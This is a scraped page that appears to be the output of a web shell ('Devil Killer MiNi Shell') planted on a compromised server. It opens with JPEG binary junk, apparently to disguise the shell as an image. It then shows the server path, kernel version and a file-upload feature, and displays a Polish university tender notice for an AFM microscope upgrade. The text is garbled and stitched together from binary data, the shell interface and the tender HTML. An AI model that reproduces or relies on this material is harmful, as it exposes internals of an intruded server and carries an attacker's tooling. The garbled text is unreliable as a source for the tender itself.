JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250213/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250213/0010342101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Modernizacja mikroskopu AFM z doposażeniem w sondę Kelvina </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Łódzka</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Inżynierii Procesowej i Ochrony Środowiska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001583</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wólczańska 213</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-924</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">agnieszka.brewka@p.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zp.p.lodz.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja mikroskopu AFM z doposażeniem w sondę Kelvina </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4f8927d6-1a76-41c9-a87c-b43a552635b6</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00103421</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00034614/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Modernizacja mikroskopu sił atomowych (AFM) firmy Veeco model Multimode Nanoscope 3D do modelu Nanoscope 6 z doposażeniem w postaci sondy Kelvina</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://plodz.ezamawiajacy.pl/pn/plodz/demand/195786/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://plodz.ezamawiajacy.pl/pn/plodz/demand/195786/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja odbywa się przy użyciu<br/>strony prowadzonego postępowania. Korzystanie jest bezpłatne. Sposób korzystania określony jest w „Instrukcji dla Wykonawcy”<br/>załączniku nr 5 do SWZ.<br/>2.Za datę wpływu oświadczeń, dokumentów przyjmuje się datę ich wpływu na platformie.<br/>3. W przypadku awarii platformy lub przerwy technicznej dopuszcza komunikację za pomocą e-mail: agnieszka.brewka@p.lodz.pl. Nie<br/>dotyczy to składania ofert.<br/>4. Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformie, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej minimalnej przepustowości 512 kb/s na komputer (zaleca się szerokopasmowe<br/>łącze internetowe),<br/>2) komputer klasy PC lub MAC z aktualnym systemem operacyjnym wspieranym przez producenta,<br/>3) zainstalowana wybrana przeglądarka w wersji wspieranej przez producenta obsługującego TLS 1.2,<br/>4) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>5.Formaty, przesyłanych za pomocą strony prowadzonego postępowania, danych tj. plików o wielkości do 2 GB powinny być zgodne<br/>z załącznikiem nr 2 do Rozporządzeniem w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów<br/>publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. Wśród<br/>formatów powszechnych, a nie występujących w w/w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone<br/>w takich plikach zostaną uznane za złożone nieskutecznie.<br/>6. Rekomenduje się formaty: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>7. W celu ewentualnej kompresji danych rekomenduje się: .zip lub .7Z<br/>8. Informacje na temat kodowania i czasu odbioru danych:<br/>1) plik załączony na platformie i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość<br/>otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>2) oznaczenie czasu odbioru danych przez platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchronizowanego odpowiednim źródłem czasu.<br/>9. Oferta oraz oświadczenia i dokumenty powinny być:<br/>1) sporządzone w języku polskim wg załączników do SWZ,<br/>2) sporządzone w jednym z formatów danych określonych w rozdziale XVII pkt 10 – 12 SWZ,<br/>3) podpisane pod rygorem nieważności:<br/>a) kwalifikowanym podpisem elektronicznym spełniającym wymagania<br/>eIDAS. Rekomenduje się podpis w formacie PAdES na pliku w formacie .pdf. Pliki w formacie .pdf można podpisać podpisem w<br/>formacie XAdES typem wewnętrznym otaczającym. Pliki w innych formatach niż .pdf można podpisać podpisem w formacie XAdES<br/>o typie zewnętrznym. Należy pamiętać, aby plik<br/>z podpisem przekazywać łącznie z dokumentem podpisywanym . Nie rekomenduje się podpisu XAdES typ zewnętrzny.<br/>Rekomenduje się używanie kwalifikowanego znacznika czasu przy kwalifikowanym podpisie elektronicznym,<br/>b) podpisem zaufanym dostępnym z poziomu profilu zaufanego. Wielkość poj. podpisanego pliku (dokument i podpis) nie może<br/>przekroczyć 10 MB<br/>c) podpisem osobistym w e-dowodzie . Nie jest to podpis odręcznym. Wielkość pliku w formacie .pdf wynosi maks. 5 MB. Zaleca się<br/>pliki w formacie .pdf<br/>10. Opatrzenie pliku zawierającego skompresowane dane kwalifikowanym podpisem elektronicznym jest jednoznaczne z<br/>podpisaniem oryginału dokumentu, z wyjątkiem kopii poświadczonych odpowiednio przez innego Wykonawcę ubiegającego się<br/>wspólnie z nim o udzielenie zamówienia, przez podmiot, na którego zdolnościach lub sytuacji polega Wykonawca, albo przez<br/>podwykonawcę.<br/>11. Zaleca się w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju.<br/>12. Zaleca się pliki w formatach .pdf najpierw połączyć, a następnie podpisać.<br/>Nie zaleca podpisanych już plików w formacie .pdf łączyć w jeden plik.<br/>13. Zaleca się nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://plodz.ezamawiajacy.pl/pn/plodz/demand/195786/notice/public/details</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zawarte w rozdziale XXIX SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zawarte w rozdziale XXIX SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">W9/ZP/1/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 432000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Modernizacja obecnie posiadanego mikroskopu sił atomowych (AFM) Multimode z Nanoscope III do modelu Multimode 8-HR z Nanoscope 6* lub równoważny polegająca na:<br/>Wymianie kontrolera na model Nanoscope 6* lub równoważny o parametrach:<br/>•	dwa szybkie (50 MHz), co najmniej 16-bitowe przetworniki ADC<br/>•	szybki (10 MHz), co najmniej 16-bitowy przetwornik ADC do akwizycji <br/>danych dla trybu przerywanego kontaktu z modulacją siły, trybu kontaktowego, tunelowej mikroskopii skaningowej i trybów elektrycznych z regulowanym filtrowaniem cyfrowym dla dodatkowych opcji prędkości/rozdzielczości<br/>•	co najmniej osiem 20-bitowych przetworników ADC o średniej prędkości (500 kHz)<br/>•	co najmniej dwa szybkie (50 MHz) 16-bitowe przetworniki DAC<br/>•	co najmniej osiem 16-bitowych przetworników DAC o średniej szybkości (2 MHz)<br/>•	32 bitowe sterowanie skanowaniem w trzech osiach z częstotliwością co najmniej 2 MHz umożliwiające szybkie skanowanie z najwyższymi <br/>rozdzielczościami<br/>•	dwa szybkie złącza Lock-in (10 Hz do 10 MHz) i jedno średniej prędkość (0,1 Hz do 50 kHz) zapewniające szerokopasmową obsługa trybów <br/>rezonansowych<br/>•	nowa karta DSP dedykowana do oferowanego kontrolera<br/>Wymianie elementów elektronicznych w bazie posiadanego mikroskopu Multimode niezbędnych do prawidłowej komunikacji z kontrolerem model Nanoscope 6* lub równoważnym,<br/>Wymianie kamery do podglądu optycznego o rozdzielczości min. 5MP umożliwiającą podłączenie do systemu za pomocą złącza USB.<br/>Przeprowadzona modernizacja mikroskopu sił atomowych powinna zapewnić kompatybilność z posiadanymi przez Zamawiającego modułami w postaci tunelowej mikroskopii skaningowej oraz do pomiarów prądowych w skali nano jak też skanerem i głowicą. Ponadto możliwość pracy w następujących trybach oraz parametrach:<br/>szybkość skanowania do min. 6Hz,<br/>mody pomiarowe: kontaktowy, przerywanego kontaktu, przerywanego kontaktu z modulacją siły oraz szybkozmiennym oddziaływaniem siły na powierzchnię,<br/>możliwość wykonywania pomiarów mechanicznych powierzchni próbki w postaci krzywych siłowych oraz wyznaczenia parametrów sprężystości takich jak moduł Younga. <br/>2.Doposażenie zmodernizowanego mikroskopu sił atomowych w Sondę Kelvina zapewniającą możliwość pomiarów w trybie Kelvinowskiej Mikroskopii Sił Atomowych w modzie amplitudowym umożliwiającą pracę w trybie bezkontaktowym oraz pomiar różnicy potencjałów między badaną próbką a sondą.<br/>3.Doposażenie w moduł umożliwiający pracę z dużą szybkością skanowania powierzchni.<br/>4.Wymianie podlega również jednostka sterująca (komputer) z monitorem oraz oprogramowanie zaktualizowane do najnowszej wersji umożliwiające współpracę z nowym kontrolerem model Nanoscope 6* lub równoważnym oraz korzystanie z modułu umożliwiającego pracę z dużą szybkością skanowania powierzchni jak też trybu asystenta skanowania, który optymalizuje kluczowe parametry pracy mikroskopu, dzięki czemu usprawnia pracę operatora mikroskopu.<br/>5.Zestaw sond pomiarowych do modu przerywanego kontaktu z modulacją siły i pracy w trybie Kelvinowskiej Mikroskopii Sił Atomowych w modzie amplitudowym.<br/>6.Zamawiający zobowiązuje Wykonawcę do zabrania i utylizacji wymienionych elementów mikroskopu sił atomowych AFM. <br/>7.Gwarancja minimalna 12 miesięcy.<br/>8.Wykonawca zapewni szkolenie dla personelu w miejscu instalacji aparatury w wymiarze 32 godzin dla max 5 osób w terminach ustalonych z Zamawiającym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">38510000-3 - Mikroskopy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48421000-5 - Pakiety oprogramowania do zarządzania urządzeniami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">28 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty niepodlegające odrzuceniu będą oceniane na podstawie kryterium: <br/>1)	Cena brutto oferty (C) – 60 %<br/>Punkty za to kryterium będą przyznawane na podstawie ceny podanej w sekcji B <br/>pkt. I „Formularza ofertowego” – załącznik nr 1 do SWZ.<br/>Punkty przyznane za kryterium cena ( C ) będą wyliczone wg wzoru:<br/>C= C_min/C_b × 60% <br/>Cmin	- najniższa cena spośród ofert nieodrzuconych <br/>Cb - cena oferty badanej nieodrzuconej <br/><br/>	Termin realizacji (TR) – 20% <br/>Punkty za to kryterium będą przyznawane na podstawie danych w sekcji C <br/>pkt. 1. „Formularza ofertowego” – załącznik nr 1 do SWZ.<br/>Punkty przyznane za kryterium termin realizacji ( TR ) będą wyliczone wg wzoru:<br/>Termin realizacji 4 tygodnie – 0 pkt<br/>Termin realizacji 2 tygodnie – 20 pkt<br/><br/>	Gwarancja ( G ) – 20%<br/>Punkty za to kryterium będą przyznawane na podstawie danych w sekcji C <br/>pkt. 2 „Formularza ofertowego” – załącznik nr 1 do SWZ.<br/>Punkty przyznane za kryterium gwarancja ( G ) będą wyliczone wg wzoru:<br/>Gwarancja 12 miesięcy – 0 pkt<br/>Gwarancja 18 miesięcy – 10 pkt<br/>Gwarancja 24miesiące -20 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie, o którym mowa w art. 125 ust. 1 uPzp o niepodleganiu wykluczeniu” aktualne na dzień składania ofert – załącznik nr 3 do SWZ,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie stawia warunku w powyższym zakresie</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda żadnych podmiotowych środków dowodowych <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Zgodnie z art. 58 uPzp Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. Zgodnie z art. 117 ust. 4 uPzp, Wykonawcy wspólnie ubiegający się <br/>o udzielenie zamówienia składają wraz z ofertą oświadczenie o zakresie wykonania zamówienia przez Wykonawców wspólnie ubiegających się o zamówienia w sekcji E „Formularza ofertowego”.<br/>2.W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu <br/>i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>3.Dokument potwierdzający ustanowienie pełnomocnika powinien zawierać <br/>w szczególności: <br/>1) wskazanie postępowania o zamówienie publiczne, którego dotyczy, <br/>2) Wykonawców ubiegających się wspólnie o udzielenie zamówienia, <br/>3) ustanowionego pełnomocnika,<br/>4) zakres jego umocowania. <br/>	Forma pełnomocnictwa określona jest w rozdziale XII.<br/>4.Wszelka korespondencja prowadzona będzie z Pełnomocnikiem.<br/>5.Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>6.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden <br/>z nich nie może podlegać wykluczeniu z powodu niespełnienia warunków, o których mowa w rozdziale VIII SWZ. <br/>7.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki, o których mowa w rozdziale IX, Zamawiający będzie oceniał łącznie.<br/>8.Każdy z Wykonawców wspólnie ubiegających się o zamówienie wraz z ofertą składa:<br/>1)	„Oświadczenie, o którym mowa w art. 125 ust. 1 uPzp o niepodleganiu wykluczeniu” aktualne na dzień składania ofert – załącznik nr 3 do SWZ,<br/>2)	pełnomocnictwo Wykonawców ustanawiające pełnomocnika, o którym mowa w pkt. 2 – 4 rozdziału,<br/>3)	dokument potwierdzający umocowanie do reprezentowania osoby działającej w imieniu Wykonawcy, o którym mowa w rozdziale XIII SWZ.<br/>9.Zamawiający nie żąda złożenia podmiotowych środków dowodowych w trybie określonym w art. 274 ust. 1 uPzp w rozdziale X pkt 2 SWZ. <br/>10.Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. <br/>11.Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <br/>12.Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany do umowy<br/>1.	Na mocy art. 455 ust. 1 pkt 1) ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, przewiduje się poniższe zmiany postanowień niniejszej Umowy: <br/>1)	Zmiany terminu realizacji zamówienia i/lub zamówień cząstkowych z uwagi na:<br/>a)	okoliczności, których nie można było przewidzieć na etapie wszczęcia postępowania, m.in. w sytuacji opóźnień w dostawie materiałów potrzebnych do wykonania Przedmiotu zamówienia, niezależnych od Wykonawcy;<br/>b)	wstrzymanie/przerwanie wykonania Przedmiotu zamówienia z przyczyn niezależnych od Zamawiającego lub będących następstwem zaistnienia siły wyższej i/lub <br/>c)	przyczyny niezależne od Wykonawcy 